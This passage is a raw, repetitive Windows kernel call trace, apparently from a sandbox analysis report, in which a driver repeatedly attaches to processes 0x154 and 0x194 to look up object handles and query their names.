ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28049 [0264.740] ObQueryNameString (in: Object=0xffffc00148cea4e0, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.740] ObfDereferenceObject (Object=0xffffc00148cea4e0) returned 0x8000 [0264.740] IoCompleteRequest () returned 0x0 [0264.740] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.740] PsAcquireProcessExitSynchronization () returned 0x0 [0264.740] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.740] ObReferenceObjectByHandle (in: Handle=0x304, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014aef68f0, HandleInformation=0x0) returned 0x0 [0264.740] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.740] PsReleaseProcessExitSynchronization () returned 0x2 [0264.740] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28048 [0264.740] ObQueryNameString (in: Object=0xffffc0014aef68f0, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.740] ObfDereferenceObject (Object=0xffffc0014aef68f0) returned 0x8000 [0264.740] IoCompleteRequest () returned 0x0 [0264.740] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.740] PsAcquireProcessExitSynchronization () returned 0x0 [0264.740] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.740] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014929dfc0, HandleInformation=0x0) returned 0x0 [0264.741] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.741] PsReleaseProcessExitSynchronization () returned 0x2 [0264.741] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28047 [0264.741] ObQueryNameString (in: Object=0xffffc0014929dfc0, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.741] ObfDereferenceObject (Object=0xffffc0014929dfc0) returned 0x8000 [0264.741] IoCompleteRequest () returned 0x0 [0264.741] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.741] PsAcquireProcessExitSynchronization () returned 0x0 [0264.741] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.741] ObReferenceObjectByHandle (in: Handle=0x324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148b53c00, HandleInformation=0x0) returned 0x0 [0264.741] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.741] PsReleaseProcessExitSynchronization () returned 0x2 [0264.741] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28046 [0264.741] ObQueryNameString (in: Object=0xffffc00148b53c00, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.741] ObfDereferenceObject (Object=0xffffc00148b53c00) returned 0x8000 [0264.741] IoCompleteRequest () returned 0x0 [0264.741] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.741] PsAcquireProcessExitSynchronization () returned 0x0 [0264.741] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.741] ObReferenceObjectByHandle (in: Handle=0x338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148b7d5c0, HandleInformation=0x0) returned 0x0 [0264.741] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.741] PsReleaseProcessExitSynchronization () returned 0x2 [0264.741] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28045 [0264.741] ObQueryNameString (in: Object=0xffffc00148b7d5c0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.741] ObfDereferenceObject (Object=0xffffc00148b7d5c0) returned 0x8000 [0264.741] IoCompleteRequest () returned 0x0 [0264.741] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.741] PsAcquireProcessExitSynchronization () returned 0x0 [0264.741] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.741] ObReferenceObjectByHandle (in: Handle=0x344, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a47fb60, HandleInformation=0x0) returned 0x0 [0264.741] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.741] PsReleaseProcessExitSynchronization () returned 0x2 [0264.741] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28044 [0264.741] ObQueryNameString (in: Object=0xffffc0014a47fb60, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.741] ObfDereferenceObject (Object=0xffffc0014a47fb60) returned 0x8000 [0264.741] IoCompleteRequest () returned 0x0 [0264.741] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.741] PsAcquireProcessExitSynchronization () returned 0x0 [0264.741] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.741] ObReferenceObjectByHandle (in: Handle=0x354, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014929a8d0, HandleInformation=0x0) returned 0x0 [0264.741] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.741] PsReleaseProcessExitSynchronization () returned 0x2 [0264.741] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28043 [0264.741] ObQueryNameString (in: Object=0xffffc0014929a8d0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.741] ObfDereferenceObject (Object=0xffffc0014929a8d0) returned 0x8000 [0264.741] IoCompleteRequest () returned 0x0 [0264.742] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.742] PsAcquireProcessExitSynchronization () returned 0x0 [0264.742] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.742] ObReferenceObjectByHandle (in: Handle=0x35c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014975d870, HandleInformation=0x0) returned 0x0 [0264.742] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.742] PsReleaseProcessExitSynchronization () returned 0x2 [0264.742] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28042 [0264.742] ObQueryNameString (in: Object=0xffffc0014975d870, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.742] ObfDereferenceObject (Object=0xffffc0014975d870) returned 0x8000 [0264.742] IoCompleteRequest () returned 0x0 [0264.742] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.742] PsAcquireProcessExitSynchronization () returned 0x0 [0264.742] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.742] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a480790, HandleInformation=0x0) returned 0x0 [0264.742] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.742] PsReleaseProcessExitSynchronization () returned 0x2 [0264.742] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28041 [0264.742] ObQueryNameString (in: Object=0xffffc0014a480790, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.742] ObfDereferenceObject (Object=0xffffc0014a480790) returned 0x8000 [0264.742] IoCompleteRequest () returned 0x0 [0264.742] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.742] PsAcquireProcessExitSynchronization () returned 0x0 [0264.742] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.742] ObReferenceObjectByHandle (in: Handle=0x380, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a3e9340, HandleInformation=0x0) returned 0x0 [0264.742] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.742] PsReleaseProcessExitSynchronization () returned 0x2 [0264.742] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28040 [0264.742] ObQueryNameString (in: Object=0xffffc0014a3e9340, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.742] ObfDereferenceObject (Object=0xffffc0014a3e9340) returned 0x8000 [0264.742] IoCompleteRequest () returned 0x0 [0264.742] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.742] PsAcquireProcessExitSynchronization () returned 0x0 [0264.742] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.742] ObReferenceObjectByHandle (in: Handle=0x388, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a411e30, HandleInformation=0x0) returned 0x0 [0264.742] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.742] PsReleaseProcessExitSynchronization () returned 0x2 [0264.742] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803f [0264.742] ObQueryNameString (in: Object=0xffffc0014a411e30, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.742] ObfDereferenceObject (Object=0xffffc0014a411e30) returned 0x8000 [0264.742] IoCompleteRequest () returned 0x0 [0264.742] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.742] PsAcquireProcessExitSynchronization () returned 0x0 [0264.742] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.743] ObReferenceObjectByHandle (in: Handle=0x390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a4bc170, HandleInformation=0x0) returned 0x0 [0264.743] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.743] PsReleaseProcessExitSynchronization () returned 0x2 [0264.743] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803e [0264.743] ObQueryNameString (in: Object=0xffffc0014a4bc170, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.743] ObfDereferenceObject (Object=0xffffc0014a4bc170) returned 0x8000 [0264.743] IoCompleteRequest () returned 0x0 [0264.743] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.743] PsAcquireProcessExitSynchronization () returned 0x0 [0264.743] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.743] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a4fcd20, HandleInformation=0x0) returned 0x0 [0264.743] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.743] PsReleaseProcessExitSynchronization () returned 0x2 [0264.743] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803d [0264.743] ObQueryNameString (in: Object=0xffffc0014a4fcd20, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.743] ObfDereferenceObject (Object=0xffffc0014a4fcd20) returned 0x8000 [0264.743] IoCompleteRequest () returned 0x0 [0264.743] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.743] PsAcquireProcessExitSynchronization () returned 0x0 [0264.743] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.743] ObReferenceObjectByHandle (in: Handle=0x398, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a5a68d0, HandleInformation=0x0) returned 0x0 [0264.743] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.743] PsReleaseProcessExitSynchronization () returned 0x2 [0264.743] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803c [0264.743] ObQueryNameString (in: Object=0xffffc0014a5a68d0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.743] ObfDereferenceObject (Object=0xffffc0014a5a68d0) returned 0x8000 [0264.743] IoCompleteRequest () returned 0x0 [0264.743] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.743] PsAcquireProcessExitSynchronization () returned 0x0 [0264.743] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.743] ObReferenceObjectByHandle (in: Handle=0x39c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149b962d0, HandleInformation=0x0) returned 0x0 [0264.743] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.743] PsReleaseProcessExitSynchronization () returned 0x2 [0264.743] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803b [0264.743] ObQueryNameString (in: Object=0xffffc00149b962d0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.743] ObfDereferenceObject (Object=0xffffc00149b962d0) returned 0x7ffe [0264.743] IoCompleteRequest () returned 0x0 [0264.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0264.743] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.743] PsAcquireProcessExitSynchronization () returned 0x0 [0264.743] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.747] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067ec8aa0, HandleInformation=0x0) returned 0x0 [0264.747] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.747] PsReleaseProcessExitSynchronization () returned 0x2 [0264.747] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38027 [0264.747] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.747] ObfDereferenceObject (Object=0xffffe00067ec8aa0) returned 0x7fff [0264.747] IoCompleteRequest () returned 0x0 [0264.747] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.747] PsAcquireProcessExitSynchronization () returned 0x0 [0264.747] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.768] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696d1700, HandleInformation=0x0) returned 0x0 [0264.768] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.768] PsReleaseProcessExitSynchronization () returned 0x2 [0264.768] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38026 [0264.768] ObQueryNameString (in: Object=0xffffe000696d1700, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.768] ObfDereferenceObject (Object=0xffffe000696d1700) returned 0x7fff [0264.768] IoCompleteRequest () returned 0x0 [0264.768] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.768] PsAcquireProcessExitSynchronization () returned 0x0 [0264.768] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.771] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e6e5a0, HandleInformation=0x0) returned 0x0 [0264.771] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.771] PsReleaseProcessExitSynchronization () returned 0x2 [0264.771] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38025 [0264.771] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.771] ObfDereferenceObject (Object=0xffffe00067e6e5a0) returned 0x8000 [0264.771] IoCompleteRequest () returned 0x0 [0264.771] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.771] PsAcquireProcessExitSynchronization () returned 0x0 [0264.771] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.773] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e56550, HandleInformation=0x0) returned 0x0 [0264.773] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.773] PsReleaseProcessExitSynchronization () returned 0x2 [0264.773] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38024 [0264.773] ObQueryNameString (in: Object=0xffffe00067e56550, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.773] ObfDereferenceObject (Object=0xffffe00067e56550) returned 0x7ffe [0264.773] IoCompleteRequest () returned 0x0 [0264.773] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.773] PsAcquireProcessExitSynchronization () returned 0x0 [0264.773] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.774] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e6ae40, HandleInformation=0x0) returned 0x0 [0264.774] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.774] PsReleaseProcessExitSynchronization () returned 0x2 [0264.774] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38023 [0264.774] ObQueryNameString (in: Object=0xffffe00067e6ae40, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.774] ObfDereferenceObject (Object=0xffffe00067e6ae40) returned 0x7ffe [0264.774] IoCompleteRequest () returned 0x0 [0264.774] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.774] PsAcquireProcessExitSynchronization () returned 0x0 [0264.774] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.775] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d2690, HandleInformation=0x0) returned 0x0 [0264.775] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.775] PsReleaseProcessExitSynchronization () returned 0x2 [0264.775] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38022 [0264.775] ObQueryNameString (in: Object=0xffffe000697d2690, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.775] ObfDereferenceObject (Object=0xffffe000697d2690) returned 0x7ff3 [0264.775] IoCompleteRequest () returned 0x0 [0264.775] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.775] PsAcquireProcessExitSynchronization () returned 0x0 [0264.775] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.779] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d1310, HandleInformation=0x0) returned 0x0 [0264.779] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.779] PsReleaseProcessExitSynchronization () returned 0x2 [0264.779] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38021 [0264.779] ObQueryNameString (in: Object=0xffffe000697d1310, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.779] ObfDereferenceObject (Object=0xffffe000697d1310) returned 0x7ff5 [0264.779] IoCompleteRequest () returned 0x0 [0264.779] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.779] PsAcquireProcessExitSynchronization () returned 0x0 [0264.780] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.797] ObReferenceObjectByHandle (in: Handle=0x164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d5d30, HandleInformation=0x0) returned 0x0 [0264.797] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.797] PsReleaseProcessExitSynchronization () returned 0x2 [0264.797] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38020 [0264.797] ObQueryNameString (in: Object=0xffffe000697d5d30, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.797] ObfDereferenceObject (Object=0xffffe000697d5d30) returned 0x7ffe [0264.797] IoCompleteRequest () returned 0x0 [0264.797] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.797] PsAcquireProcessExitSynchronization () returned 0x0 [0264.797] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.800] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d5920, HandleInformation=0x0) returned 0x0 [0264.800] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.800] PsReleaseProcessExitSynchronization () returned 0x2 [0264.800] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x3801f [0264.800] ObQueryNameString (in: Object=0xffffe000697d5920, 